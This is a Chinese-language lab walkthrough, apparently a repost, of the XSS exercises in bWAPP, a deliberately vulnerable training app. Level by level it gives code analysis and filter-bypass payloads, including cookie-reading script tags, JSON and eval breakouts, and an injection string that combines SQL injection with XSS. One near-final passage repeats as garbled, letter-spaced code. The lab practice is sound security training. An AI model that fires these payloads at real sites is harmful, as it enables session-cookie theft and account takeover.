bwappxss_α·pav

bwappxss_α·pavzeronil

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

XSS注入

基础知识

xss

演练

反射型

GET/POST型

low

<script>alert('XSS')</script>
//<script>alert(007)</script>
//<script>alert(document.cookie)</script>

mid

// 字符 ' " \ 为转义为 \' \" \\
function xss_check_4($data)
{ 
   
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    return addslashes($data);
}
<script>alert('XSS')</script> //报错
<script>alert(/XSS/)</script>  //成功
//在javascript 中 / 和 " 可起到一样的作用 
//<script>alert(007)</script> //成功
//<script>alert(document.cookie)</script> //成功

high

//特殊被转义为HTML实体,无法绕过
function xss_check_3($data, $encoding = "UTF-8")
{ 
   

    // htmlspecialchars - converts special characters to HTML entities 
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;' 
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

JSON反射

low

代码分析

关键代码如下

通过URL获得字段$title,并在数组中查询,如果找不到就返回JSON数据。

通过JSON.parse()J将数据转换为 JavaScript 对象

故可控制$title值对<script>进行闭合

if(! in_array(strtoupper($title), $movies)){ 
   
	$string = '{"movies":[{"response":"' . $title . '??? Sorry, we don&#039;t have that movie :("}]}';
}

<script>
		var JSONResponseString = '<?php echo $string ?>';
     	// var JSONResponse = eval ("(" + JSONResponseString + ")");
        var JSONResponse = JSON.parse(JSONResponseString);
        document.getElementById("result").innerHTML=JSONResponse.movies[0].response;
</script>

"}]}';alert(document.cookie)</script>

//"}]}';</script><script>alert(document.cookie)</script>

//<script>
// var JSONResponseString = '<?php echo $string ?>';
//变为
//<script>
// var JSONResponseString = '{"movies":[{"response":""}]}';alert(document.cookie) </script>

mid/high

使用 htmlspecialchars()函数把特殊字符(& ’ ” < >)转义为HTML实体无法桡过

AJAX反射

low/mid

<img src=x onerror=alert(document.cookie)>
//<svg οnlοad=alert(document.cookie)>

high

使用 htmlspecialchars()函数把特殊字符(& ’ ” < >)转义为HTML实体无法桡过

XML反射

low/mid

在XML解析payload需要注意<>两个字符需要使用HTML实体编码

&lt;img src=x onerror=alert(document.cookie)&gt;

high

使用 htmlspecialchars()函数把特殊字符(& ’ ” < >)转义为HTML实体无法桡过

Referer 注入

代码分析

<div id="main">
    
    <h1>XSS - Reflected (Back Button)</h1>
    
    <p>Click the button to go to back to the previous page:

    <input type=button value="Go back" onClick="document.location.href='<?php echo isset($_SERVER["HTTP_REFERER"]) ? xss($_SERVER["HTTP_REFERER"]) : ""?>'">
    
    </p>

</div>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rBrPPfy4-1609946435939)(bWAPP-XSS/image-20201006183234683.png)]

对onClick进行适当闭合即可

low

"><script>alert(document.cookie)</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FOSCpeVv-1609946435942)(bWAPP-XSS/image-20201006183413428.png)]

mid

"><script>alert(document.cookie)</script>

此处使用addslashes()函数导致"><script>alert("XSS")</script>但是 "><script>alert(document.cookie)</script>却可以绕过,可见 >之前的 "不受影响

high

无法绕过

Header注入

代码分析

<div id="main">

    <h1>XSS - Reflected (Custom Header)</h1>

    <p>Some web clients use custom HTTP request headers...</p>

    <p>

    Content of our <b>bWAPP</b> header:
<?php foreach(getallheaders() as $name => $value) { if($name == "bWAPP") //如果存在名为bWAPP的请求头,就读取请求头内容 { echo "<i>" . xss($value) ."</i>"; } } ?>
    </p>
</div>

low

bWAPP: <script>alert(document.cookie)</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AmHdTSVq-1609946435944)(bWAPP-XSS/image-20201006185758145.png)]

mid

只要payload中不出现 ' " \,均可绕过

bWAPP: <script>alert(document.cookie)</script>

high

无法绕过

eval注入

代码分析

<script>
    eval("document.write(<?php echo xss($_GET["date"])?>)");
</script>

更改url参数,进行注入

可利用 document.write()直接执行alert(),或对eval()进行闭合

low

alert(document.cookie)

//)");alert(document.cookie)</script>

mid

eval(String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41))

//eval(alert(/xss/))

JavaScript eval() 函数

JavaScript fromCharCode() 方法

high

写死了,只要不是Date()函数就报错,无法绕过

 <?php
    if(isset($_GET["date"]))
    { 
       
        if($_COOKIE["security_level"] == "2")
        { 
   
            if($_GET["date"] != "Date()")
            { 
    
                echo "<p><font color=\"red\">Invalid input detected!</font></p>";     

            }}}         
    ?>

HREF注入

代码分析

<td align="center"> <a href=xss_href-3.php?movie=<?php echo $row["id"]; ?>&name=<?php echo hpp($name);?>&action=vote>Vote</a></td>

通过对 $name的控制,实现绕过

low

name=?><img src=x onerror=alert(document.cookie)><?php&action=vote

mid/high

使用 urlencode()进行url编码,无法绕过

Login form注入

代码分析

$sql = "SELECT * FROM heroes WHERE login = '" . $login . "' AND password = '" . $password . "'";

通过sql注入和xss联合使用

low

' or 1=1 "<script>alert(document.cookie)</script>"

mid/high

无法绕过

PHP_SELF 注入

代码分析

<?php
    if(isset($_GET["form"]) && isset($_GET["firstname"]) && isset($_GET["lastname"]))
    { 
      
        $firstname = $_GET["firstname"];
        $lastname = $_GET["lastname"];    
        if($firstname == "" or $lastname == "")
        { 
   
            echo "<font color=\"red\">Please enter both fields...</font>";       
        }
        else            
        { 
    
            echo "Welcome " . xss($firstname) . " " . xss($lastname);   
        }
    }
    ?>

对用户输入内容进行输出。(类似留言板)

low

<script>alert(document.cookie)</script>

mid

不出现 ' " \ 即可

<script>alert(document.cookie)</script>

high

无法绕过

请求头Referer注入

代码分析

<?php
    if(isset($_SERVER["HTTP_REFERER"])) 
    { 
      
        // print_r($_SERVER);
        $referer = $_SERVER["HTTP_REFERER"];
        echo "<p>The referer: <i>" . xss($referer) . "</i></p>"
    }
    else     
    { 
   
        echo "<p><font color=\"red\">No referer was used!</font></p>";   
    }
    ?>

与留言版类似,注入点在 Referer 字段

low

<script>alert(document.cookie)</script>

mid

不出现 ' " \ 即可

<script>alert(document.cookie)</script>

high

无法绕过

请求头User-Agent注入

代码分析

<?php
    if(isset($_SERVER["HTTP_USER_AGENT"]))
    { 
   
       // print_r($_SERVER);
        $user_agent = $_SERVER["HTTP_USER_AGENT"];
        echo "<p>Your User-Agent: <i>" . xss($user_agent) . "</i></p>";
    }
    else
    { 
   
        echo "<p><font color=\"red\">No User-Agent was used!</font></p>";
    }
    ?>

low

<script>alert(document.cookie)</script>

mid

不出现 ' " \ 即可

<script>alert(document.cookie)</script>

high

无法绕过

存储型

blog

代码分析

<tr height="40">
	<td align="center"><?php echo $row->id; ?></td>
	<td><?php echo $row->owner; ?></td>
	<td><?php echo $row->date; ?></td>
	<td><?php echo $row->entry; ?></td> <!--根据不同的security_level对$row->entry进行消毒-->
</tr>

low

<script>alert(document.cookie)</script>

mid

不出现 ' " \ 即可

<script>alert(document.cookie)</script>

high

无法绕过

Change Secret(HTML hidden)注入

代码分析

//low 对提交的$login和$secret都进行了严格的消毒
    $login = mysqli_real_escape_string($link, $login);
    $secret = mysqli_real_escape_string($link, $secret);
    $secret = xss($secret);

//mid high对提交的$secret都进行了严格的消毒
    $secret = mysqli_real_escape_string($link, $secret);
    $secret = htmlspecialchars($secret, ENT_QUOTES, "UTF-8");

故无法直接对 secret进行注入

low

"><script>alert(document.cookie)</script>

mid/high

l o g i n 和 login和 loginsecret都进行了严格的消毒
l o g i n = m y s q l i r e a l e s c a p e s t r i n g ( login = mysqli_real_escape_string( login=mysqlirealescapestring(link, $login);
s e c r e t = m y s q l i r e a l e s c a p e s t r i n g ( secret = mysqli_real_escape_string( secret=mysqlirealescapestring(link, $secret);
s e c r e t = x s s ( secret = xss( secret=xss(secret);

//mid high对提交的$secret都进行了严格的消毒
s e c r e t = m y s q l i r e a l e s c a p e s t r i n g ( secret = mysqli_real_escape_string( secret=mysqlirealescapestring(link, $secret);
s e c r e t = h t m l s p e c i a l c h a r s ( secret = htmlspecialchars( secret=htmlspecialchars(secret, ENT_QUOTES, “UTF-8”);


故无法直接对 `secret`进行注入

#### low

```javascript
"><script>alert(document.cookie)</script>

mid/high

无法绕过

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/193627.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • BufferedWriter输出流的使用「建议收藏」

    BufferedWriter输出流的使用「建议收藏」packagecom.lzxa.analyze.common;importjava.io.*;importjava.text.DateFormat;importjava.text.SimpleDateFormat;importjava.util.Date;/***输入流*/publicclassIOBufferedWriter{static…

  • qt显示视频的控件_qt 控件

    qt显示视频的控件_qt 控件一、前言在平时的写作过程中,经常需要将一些操作动作和效果图截图成gif格式,使得涵盖的信息更全面更生动,有时候可以将整个操作过程和运行效果录制成MP4,但是文件体积比较大,而且很多网站不便于上传,基本上都支持gif动图,一般一个5秒左右的gif,800*600分辨率,可以很好的控制在500KB内,这样就比较完美的支持各大网站上传动图。最开始使用的是ScreenGif.exe,用了很久…

  • vue监听页面刷新事件_vue监听数据变化自动刷新

    vue监听页面刷新事件_vue监听数据变化自动刷新运用的知识点:JavaScript的onbeforeunload函数使用方法window.onbeforeunload=function(){  return‘’;}注意:有返回值(”,true,false…都可以)才能弹出显示,或者有需要执行的事件也行。onload、onunload、onbeforeunload的执行问题:页面加载…

    2022年10月24日
  • but六种用法_比较级的用法和句型

    but六种用法_比较级的用法和句型1.EXPLAIN简介使用EXPLAIN关键字可以模拟优化器执行SQL查询语句,从而知道MySQL是如何处理你的SQL语句的。分析你的查询语句或是表结构的性能瓶颈。➤通过EXPLAIN,我们可以分析出以下结果:表的读取顺序数据读取操作的操作类型哪些索引可以使用哪些索引被实际使用表之间的引用每张表有多少行被优化器查询➤使用方式如下:EXPLAIN+SQL语…

    2022年10月18日
  • pycharm安装与配置_pycharm安装教程2019

    pycharm安装与配置_pycharm安装教程2019文章目录一、下载并安装PyCharm二、配置PyCharm三、编写第一个python脚本(helloword)四、环境变量配置1.win+r输入cmd,输入python,可以看到python版本2.如果你输入python直接跳转到微软商店一、下载并安装PyCharm官网下载地址:https://www.jetbrains.com/pycharm/download/#section=windows我们这里选择下载社区版,因为专业版要收钱,不过社区版会比专业版要少一些功能,例如:Web开.

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号